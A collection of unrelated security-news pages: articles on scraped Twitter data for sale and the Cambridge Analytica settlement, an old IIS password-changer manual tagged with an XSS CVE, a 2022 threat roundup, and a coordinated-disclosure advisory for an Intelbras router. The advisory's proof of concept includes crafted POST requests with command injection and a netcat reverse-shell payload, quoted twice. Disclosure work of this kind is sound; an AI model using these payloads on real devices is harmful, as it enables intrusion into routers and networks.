By Habiba Rashid
The threat actor claims that Twitter data was "scraped via a vulnerability."
This is a post from HackRead.com Read the original post: 400 Million Twitter Users’ Scraped Info Goes on Sale!

The sample data seen by Hackread.com shows that the sold information also includes records on top celebrities and political figures, such as Democratic Rep. Alexandria Ocasio-Cortez and Bollywood’s Salman Khan.

On December 23, 2022, a threat actor going by the handle “Ryushi” claimed to sell more than 400 million Twitter users’ personal details on BreachedForums, a cybercrime and hacking forum that surfaced as an alternative to the **now-seized Raidforums**.

As seen by Hackread.com, the sample data attached to the post contains private email addresses, usernames, follower counts, creation dates, and, in certain cases, the user’s phone numbers.

The sample data also contains a variety of well-known user accounts including New York Democratic Rep. Alexandria Ocasio Cortez, Ethereum cryptocurrency founder Buterin, Indian actor Salman Khan and cybersecurity reporter Brian Krebs. 

> Hey @elonmusk, since you don't seem to have much a media/comms team anymore, can you address the apparently legitimate claim that someone scraped & is now selling data on hundreds of millions of Twitter accounts? Maybe it didn't happen on your watch, but you owe Twitter a reply.
> 
> — briankrebs (@briankrebs) December 27, 2022

It is worth mentioning that the latest data leak came just one month after a hacker leaked the contact and personal details of over **5.3 million Twitter users** online. Both the earlier and latest incidents are now being **investigated** by Irish authorities.

The threat actor stated in the post that the data had been “scraped via a vulnerability” but did not specify any further details.

Further, they openly advised the **CEO of the social media giant, Elon Musk**, that he should buy this data directly from the hacker instead of “paying $276 million USD in GDPR breach fines like Facebook did” but does not specify a price at which the data is being sold.

Sample data seen and analyzed by Hackread.com (Image credit: Waqas – Hackread.com)

Offering to conduct the “deal” through a middleman, the threat actor states, “After that, I will remove this thread and will not sell this info again. And data won’t be sold to anyone else, which will stop a lot of celebrities and politicians from Phishing, Crypto scams, Sim swapping, Doxxing, and other things that will make your users lose trust in you as a company and thus stunt the current growth and hype.”

Researchers who have seen the sample data believe that this alleged data leak is the result of an API flaw which allowed the threat actor to search any email addresses or phone numbers and return a **Twitter** profile.

This attack followed only months after Twitter entered into a **consent order** with the US Federal Trade Commission binding it to maintain a privacy and information security program for the next two decades.

The agreement ended a federal investigation into Twitter’s use of phone numbers and email addresses for advertising purposes when they were collected to be used for multi-factor authentication. Twitter also paid a $150 million civil penalty.

Therefore, if this data breach is verified, the impact on Twitter would be drastic both financially and socially. At the time of writing, the data was still up for grabs.

1.  **Hackers leak scraped data of 87,000 GETTR users**
2.  **Nearly 500 million WhatsApp User Records Sold Online**
3.  **Leaky Server Exposing Scraped Data of 150,000 Mastodon Users**
4.  **Leaked: 235m Instagram, TikTok, YouTube users’ scraped records**
5.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

400 Million Twitter Users’ Scraped Info Goes on Sale!

Meta Platforms, the parent company of Facebook, Instagram, and WhatsApp, has agreed to pay $725 million to settle a long-running class-action lawsuit filed in 2018.
The legal dispute sprang up in response to revelations that the social media giant allowed third-party apps such as those, including Cambridge Analytica to access users' personal information without their consent for political

Meta Platforms, the parent company of Facebook, Instagram, and WhatsApp, has agreed to pay $725 million to settle a long-running class-action lawsuit filed in 2018.

The legal dispute sprang up in response to revelations that the social media giant allowed third-party apps such as those, including Cambridge Analytica to access users' personal information without their consent for political advertising.

The proposed settlement, first reported by Reuters last week, is the latest penalty paid by the company in the wake of a number of privacy mishaps through the years. It still requires the approval of a federal judge in the San Francisco division of the U.S. District Court.

It's worth noting that Facebook previously sought to dismiss the lawsuit in September 2019, claiming users have no legitimate privacy interest in any information they make available to their friends on social media.

The data harvesting scandal, which came to light in March 2018, involved a personality quiz app called "thisisyourdigitallife" that allowed users' public profiles, page likes, dates of birth, genders, locations, and even messages (in some cases) to be collected for building psychographic profiles.

The app was developed by an academic researcher named Aleksandr Kogan and his company Global Science Research (GSR) in 2013 as part of a collaboration with Cambridge Analytica, a British political consultancy firm owned by SCL Group.

While around 300,000 users are said to have taken the psychological test, the app collected the private data of those who installed the app as well as their Facebook friends without seeking explicit permission, leading to a dataset spanning 87 million profiles.

thisisyourdigitallife was subsequently banned by Facebook in 2015 for contravention of its platform policy, with the company also sending a legal request to GSR and Cambridge Analytica to delete the improperly acquired data.

Only it turned out later that the unauthorized data was never purged to begin with and that the consulting firm, now defunct, used the personal information from millions of Facebook accounts for purposes of voter profiling and targeting ahead of the 2016 U.S. presidential election.

"This was a breach of trust between Kogan, Cambridge Analytica, and Facebook," CEO Mark Zuckerberg said at the time. "But it was also a breach of trust between Facebook and the people who share their data with us and expect us to protect it."

The bombshell expose fueled government scrutiny on both sides of the Atlantic, prompting the company to settle with the U.S. Securities and Exchange Commission (SEC) and the U.K. Information Commissioner's Office (ICO) in 2019.

The same year, Meta was also slapped with a record-breaking $5 billion fine following a probe initiated by the U.S. Federal Trade Commission (FTC) into its privacy practices and to settle charges that the firm undermined users' choice to control the privacy of their personal information.

Meta – which has not admitted to any wrongdoing in relation to the problematic data-sharing practice – has since taken steps to curtail third-party access to user information.

The tech giant further rolled out a tool called Off-Facebook Activity for users to "see a summary of the apps and websites that send us information about your activity, and clear this information from your account if you want to."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Facebook to Pay $725 Million to settle Lawsuit Over Cambridge Analytica Data Leak

Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.

**Year 2000 statement**

Password Manager for IIS does not include any time or date oriented functionality or code. Thus, it can be safely assumed that the product itself will perform well in the year 2000 and above.

However, it is dependant on the operating system and web server it is running on. Please see the supplying vendors notices for their product's year 2000 compliance. In the case of Password Manger for IIS, this is mainly Microsoft (which can be found at http://www.microsoft.com). Other vendor information might also apply, e. g. if you use a third party IP stack.

**Installation**

Password Manager for IIS is high performing tool using only minimal system resources. It also doesn't require an extended installation process.

**System Requirements**

This product is compatible with all versions of Microsoft IIS. It supports Windows NT 4, Windows 2000, Windows 2003 and Windows XP.

Active Directory users please note: Password Manager for IIS does run without any problems on Windows 2000. Many users use it with great success in Active Directory environments. However, Password Manager uses NT domain API calls to change the password, so you need to refer to the short name to all objects and domains.

**The Installation Process**

Actual installation is very straightforward

1.  unzip the install set
2.  copy PasswordManager.dll (the ISAPI extension DLL) to any web directory on your IIS you like. Make sure, you have excute permissions inside IIS for this directory set (not only scripting!).
3.  copy the sample password change dialog and customize it according to your needs (or create your own from scratch).

The product does not perform or require any registry modifications.

**Uninstallation**

There is no need for any formal uninstallation process. Simply delete the ISAPI extension DLL (PasswordManager.dll) as well as any page you are using Password Manger for IIS on.

**Usage**

Password Manager for IIS is a standard ISAPI extension callable from any HTTP form. You can include it into your web site by creating a simple (or sophisticated ;-) ) web form with your favourite HTML editor (like Microsoft Frontpage or Macromedia DreamWeaver).

The "ACTION" tag of the html form must point to the PasswordManager.dll ISAPI extension. Be sure to specify the correct path to the DLL. This is depending on where you copied the DLL to and where your actual form resides. If ever in doubt, use a full name like: http://www.yourserver.com/yourdirectory/passwordmanger.dll. The form needs to include the following fields:

**FieldName**

**Used for**

LANGUAGE

Select language for response text generated by Password Manager for IIS. Supported values are "DE" for German, "BR" for Brazilian Portugese and "EN" for English. This field can be omitted and defaults to English.

DOMAIN

Name of the NT Domain that is to be used for password changes. Only users from this domain can change their password (if you have multiple domains, the users needs to enter the correct one or select it from a list box).

Please note: if you run Password Manager for IIS in a workgroup environmen, this parameter must hold the computer name, NOT the workgroup name!

This field is mandatory.

RESULTURL

The URL PasswordManager redirects to after it tried to change the password. This URL is called from within Password Manager. We recommend it to be a fully qualified name (e.g. starting with HTTP). This URL will be passed the outcome of the operation as parameter "state". It is up to the page residing at this URL to decode "state" and provide feedback to the user. The URL is called as follows:

RESULTURL?state=OperationStatus

See appendix for statuses.

Please note: unregistered versions of Password Manager will redirect after a 10 second delay only.

If this field is not specified, Password Manager provides a default status form.

USER

NT User name (without domain part) of the users who's password needs to be changed.

OLDPWD

Old password

NEWPWD

New password

NEWPWDCONFIRM

Confirmation of new password. NEWPWD & NEWPWDCONFIRM need to be identical, otherwise password manager for IIS does not change the users' password.

**Sample**

The following is a simple sample form. It assumes that PasswordManager is stored in a directory named "ISAPI" that is on the same directory level as the one the form is stored in. One example might be:

"<web-root>/forms" for the form's html file and  
"<web-root>/ISAPI" for the extension DLL

<html>  
										<head>  
										<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
										<title>Change Domain Password</title>  
										</head>  
										<body>  
										<p><strong><big>Change Domain 
										Password</big></strong></p>  
										<form method="post" action="../isapi/PasswordManager.dll">  
										<input type="hidden" name="Language" value="EN">  
										<input type="hidden" name="Domain" value="YOURNTDOMAIN">  
										<div align="left"><table border="0" cellpadding="0" 
										cellspacing="0">  
										<tr>  
										<td><strong>User Name</strong></td>  
										<td><input type="text" name="User" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>Current Password</strong></td>  
										<td><input type="password" name="OldPwd" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>New Password</strong></td>  
										<td><input type="password" name="NewPwd" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>New Password Confirmation</strong></td>  
										<td><input type="password" name="NewPwdConfirm" 
										size="20"></td>  
										</tr>  
										<tr>  
										<td><strong></strong></td>  
										<td><input type="submit" value="Change Password!">  
										    <input type="reset">  
										</td>  
										</tr>  
										</table>  
										</div>  
										</form>  
										</body>  
										</html>  
									

The example above is for a simple change password dialog with no customised result page. Inside the install set is a more complex sample.

These sample assumes that the sample-form.htm and MyResultPage.asp files are copied in a web root. There should be a directory named "isapi" in wich PasswordManger.dll resides. Sample-form.htm is basically the same sample as above, but references MyResultPage.asp as a customized result page. Once PasswordManager has done it's actions, it calls this page with a parameter "state". MyResultPage.asp evaluates this "state" variable and displays an appropriate message. You are free to do whatever you want inside this result page.

Please note that the unregistered version of Password Manager has a delay of 10 seconds before redirecting to the result page. The registered version will immediately redirect.

**Status Codes**

The following status codes are used by Password Manager to indicate the outcome of the change password operation:

**Code**

**Meaning**

0

success (all others indicate failure)

5 or 53

PDC not found.  
Most probable causes are:

*   Domain name misspelled
*   PDC actually down (powered off or otherwise offline)
*   If Password Manager for IIS is to be used in a Workgroup environment, Parameter DOMAIN must hold the computer name, NOT the workgroup name.
*   User restriction "Can't change password" checked in user manager

86

Old Password incorrect

2245

New password is too short.

2221

Invalid Username. Most probably typo, user account does not exist.

4294967295

Fields "New Password" and "New Password Confirm" do not match.

**Version History**

This short history shall provide you with some background information about the versions available as well as their pros and cons.

**1.0**

This is the initial release.

**1.1**

Some minor bug fixes.

**2.0**

*   Fully compatible with Windows 2000 (tested with build 2072)
*   Error Reporting Improved (less "error xx occured")
*   Portugese Language versions available
*   Paramter "RESULTURL" added. This allows to fully customize the whole change password process.

**How to obtain Updates**

Please visit our web site http://www.Adiscon.com for information about new and updated products. Registered users will receive notification of new versions via email. The registration is valid for the current major release as well as the next one (in this case 3.0).

**License**

Password Manager for IIS is distributed as **Shareware**. You are free to use the product for evaluation. However, if you feel comfortable with it and plan to use it for an extended period of time, you must **register** with Adiscon and pay the license fee.

We do not want to restrict the length of the evaluation period by some kind of software mechanism. However, we think an evaluation period of 1 month should be reasonable for all parties interested.

Please support further development by registering the product. There is a license fee per Windows NT system Password Manager for IIS is running on. You need only one license per machine, even if you run multiple virtual servers on a single machine or have multiple CPUs inside it.

For orders outside of Germany, the licnse fee is $US 89 (plus tax if applicable). EU residents with VAT identification number should state this number in order to get an tax exemption. If not stated, full VAT will be charged. All EU orders will be processed in Euro. US$ payment is available for international customers, only.

Please call for volume orders.

BBS sysops feel free to include the distribution set of this product in your library. Please be sure to include the full set (program & this documentation). Any questions can be directed at Info@Adiscon.com.

**Are there any restrictions in the unregistered version?**

Nope - we don't like "crippleware". However, the unregistred version does identify itself as unregistered in its responses to password change requests. Based on experience we needed to introduced a slight delay whith the RESULTURL version - if we hadn't done this, nobody would ever see the "unregistered" message. We think this is fair.

**How to register**

Registration is as simple as 1-2-3:

1.  Print out the following registration form
2.  Please fill it in. Remember to include number of licenses requested and payment information **as well as your email id**.
3.  Mail or fax the registration form to Adiscon.

We accept cash (bills please - and: no faxed ones, please ;-) ) as well as MasterCard/Eurocard or American Express cards. We also accept payment by check if - and only if - the following criteria is met:

If you are paying in US$, your check must be drawn on an US American bank and made payable to "Rainer Gerhards" (very important, do not make payable to Adiscon GmbH!).

We are currently working on secure online payment systems.

If you need an additional payment options, please contact us at Info@Adiscon.com or the below given addresses. Please note that - for your security - we generally do not accept email registrations. We strongly encourage you **never** to transmit your credit card information in clear text over the Internet.

Direct your registrations to:

Adiscon GmbH  
Franz-Marc Strasse 144  
50374 Erftstadt  
Germany

Fax: +49-9349-928820  
email: Info@Adiscon.com  
Web: http://www.Adiscon.com

Due to German laws all credit card orders need to be processed in DEM. US$ payments will be converted to DEM according to current exchange rate. There might be a slight difference in the converted value due to exchange rate differences.

**Registration / Order Form**

**Password Manager for IIS  
Registration / Order**

Company

 

**Name**

 

Address

 

Country

 

Phone

 

Fax

 

**email**

 

VAT registration number (EU residents only)

 

**Nbr. of Licenses**

 

**Payment**

o Cash o MasterCard o American Express o Check  
o JCB  o VISA 

**Price**

 

**Credit Card Information**

Card Number: \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Cardholder Name (as imprinted on card): \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Expiration Date \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Please be sure to specify your email address, number of licenses requested and payment information (fields in bold typeface).

Please sign below:

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_  
Date & Signature

and forward this form to

Adiscon GmbH  
Paul-Klee-Str. 7  
50374 Erftstadt  
Germany

Fax: +49-2235-985032  
Fax option for MasterCard orders, only.

**Liability**

Please use the evaluation period to check if Password Manager for IIS is suitable for you and your system environment. We encourage you to try the product in a test environment. We accept no liability for any damage during the evaluation period.

Liability for registered users is limited to the amount of the registration fee.

**Copyrights**

This documentation as well as the actual Password Manager for IIS product is copyrighted by Adiscon GmbH, Germany.

Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corp., Redmond, WA, USA.

**Other Products of Interest**

You might be interested in other fine system management tools from Adiscon. Be sure to have a look at our products at http://www.Adiscon.com.

CVE-2022-36664: Password Manger for IIS * User Manual * Version 1.0

As we are nearing the end of 2022, looking at the most concerning threats of this turbulent year in terms of testing numbers offers a threat-based perspective on what triggers cybersecurity teams to check how vulnerable they are to specific threats. These are the threats that were most tested to validate resilience with the Cymulate security posture management platform between January 1st and

As we are nearing the end of 2022, looking at the most concerning threats of this turbulent year in terms of testing numbers offers a threat-based perspective on what triggers cybersecurity teams to check how vulnerable they are to specific threats. These are the threats that were most tested to validate resilience with the Cymulate security posture management platform between January 1st and December 1st, 2022.

**Manjusaka****Date published: August 2022**

Reminiscent of Cobalt Strike and Sliver framework (both commercially produced and designed for red teams but misappropriated and misused by threat actors), this emerging attack framework holds the potential to be widely used by malicious actors. Written in Rust and Golang with a User Interface in Simple Chinese (see the workflow diagram below), this software is of Chinese origin.

Manjasuka carries Windows and Linux implants in Rust and makes a ready-made C2 server freely available, with the possibility of creating custom implants.

**Geopolitical context**

Manjasuka was designed for criminal use from the get-go, and 2023 could be defined by increased criminal usage of it as it is freely distributed and would reduce criminal reliance on the misuse of commercially available simulation and emulation frameworks such as Cobalt Strike, Sliver, Ninja, Bruce Ratel C4, etc.

At the time of writing, there was no indication that the creators of Manjasuka are state-sponsored but, as clearly indicated below, China has not been resting this year.

**PowerLess Backdoor****Date published: February 2022**

Powerless Backdoor is the most popular of this year Iran-related threats, designed to avoid PowerShell detection. Its capabilities include downloading a browser info stealer and a keylogger, encrypting and decrypting data, executing arbitrary commands, and activating a kill process.

**Geopolitical context**

The number of immediate threats attributed to Iran has jumped from 8 to 17, more than double of the similar 2021 period. However, it has slowed considerably since the September 14th U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) sanctions against Iranian cyber actors, trickling down to a single attack imputed to Iran since then.

The current political tensions within Iran will no doubt impact the frequency of attacks in 2023, but at this stage, it is difficult to evaluate whether those will increase or decrease.

**APT 41 targeting U.S. State Governments****Date published: March 2022**

Already flagged as very active in 2021, APT41 is a Chinese state-sponsored attacker group activity that showed no sign of slowing down in 2022, and investigations into APT41 activity uncovered evidence of a deliberate campaign targeting U.S. state governments.

APT 41 uses reconnaissance tools, such as Acunetix, Nmap, SQLmap, OneForAll, subdomain3, subDomainsBrute, and Sublist3r. It also launches a large array of attack types, such as phishing, watering hole, and supply-chain attacks, and exploits various vulnerabilities to initially compromise their victims. More recently, they have been seen using the publicly available tool SQLmap as the initial attack vector to perform SQL injections on websites.

This November, a new subgroup, Earth Longhi, joined the already long list of monikers associated with APT 41 (ARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon). Earth Longhi was spotted targeting multiple sectors across Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine.

**Geopolitical context**

According to Microsoft digital Defense Report 2022, "Many of the attacks coming from China are powered by its ability to find and compile "zero-day vulnerabilities" – unique unpatched holes in software not previously known to the security community. China's collection of these vulnerabilities appears to have increased on the heels of a new law requiring entities in China to report vulnerabilities they discover to the government before sharing them with others."

**LoLzarus Phishing Attack on DoD Industry****Date published: February 2022**

Dubbed LolZarus, a phishing campaign attempted to lure U.S. defense sector job applicants. This campaign was initially identified by Qualys Threat Research, which attributed it to the North-Korean threat actor Lazarus (AKA Dark Seoul, Labyrinth Chollima, Stardust Chollima, BlueNoroff, and APT 38). Affiliated with North Korea's Reconnaissance General Bureau, this group is both politically and financially motivated and were best known for the high profile attack on Sondy in 2016 and WannaCry ransomware attack in 2017.

The LolZarus phishing campaign relied on at least two malicious _documents, Lockheed\_Martin\_JobOpportunities.docx_ and _salary\_Lockheed\_Martin\_job\_opportunities\_confidential.doc,_ that abused macros with aliases to rename the API used and relied on ActiveX Frame1\_Layout to automated the attack execution. The macro then loaded the WMVCORE.DLL Windows Media dll file to help deliver the second stage shellcode payload aimed at hijacking control and connecting with the Command & Control server.

**Geopolitical context**

Another two North Korean notorious attacks flagged by CISA this year include the use of Maui ransomware and activity in cryptocurrency theft. Lazarus subgroup BlueNoroff seems to have branched out of cryptocurrency specialization this year to also target cryptocurrency-connected SWIFT servers and banks. Cymulate associated seven immediate threats with Lazarus since January 1st, 2022.

**Industroyer2****Date published: April 2022**

Ukraine's high-alert state, due to the conflict with Russia, demonstrated its efficacy by thwarting an attempted cyber-physical attack targeting high-voltage electric substations. That attack was dubbed Industroyer2 in memory of the 2016's Industroyer cyber-attack, apparently targeting Ukraine power stations and minimally successful, cutting the power in part of Kyiv for about one hour.

The level of Industroyer2 customized targeting included statically specified executable file sets of unique parameters for specific substations.

**Geopolitical context**

Ukraine's cyber-resilience in protecting its critical facilities is unfortunately powerless against kinetic attacks, and Russia appears to have now opted for more traditional military means to destroy power stations and other civilian facilities. According to ENISA, a side-effect of the Ukraine-Russia conflict is a recrudescence of cyber threats against governments, companies, and essential sectors such as energy, transport, banking, and digital infrastructure, in general.

In conclusion, as of the five most concerning threats this year, four have been directly linked with state-sponsored threat actors and the threat actors behind the fifth one are unknown, it appears that geopolitical tensions are at the root of the most burning threat concerns for cybersecurity teams.

As state-sponsored attackers typically have access to cyber resources unattainable by most companies, pre-emptive defense against complex attacks should concentrate on security validation and continuous processes focused on identifying and closing in-context security gaps.

_Note: This article was written and contributed by David Klein, Cyber Evangelist at Cymulate._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

2022 Top Five Immediate Threats in Geopolitical Context

Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
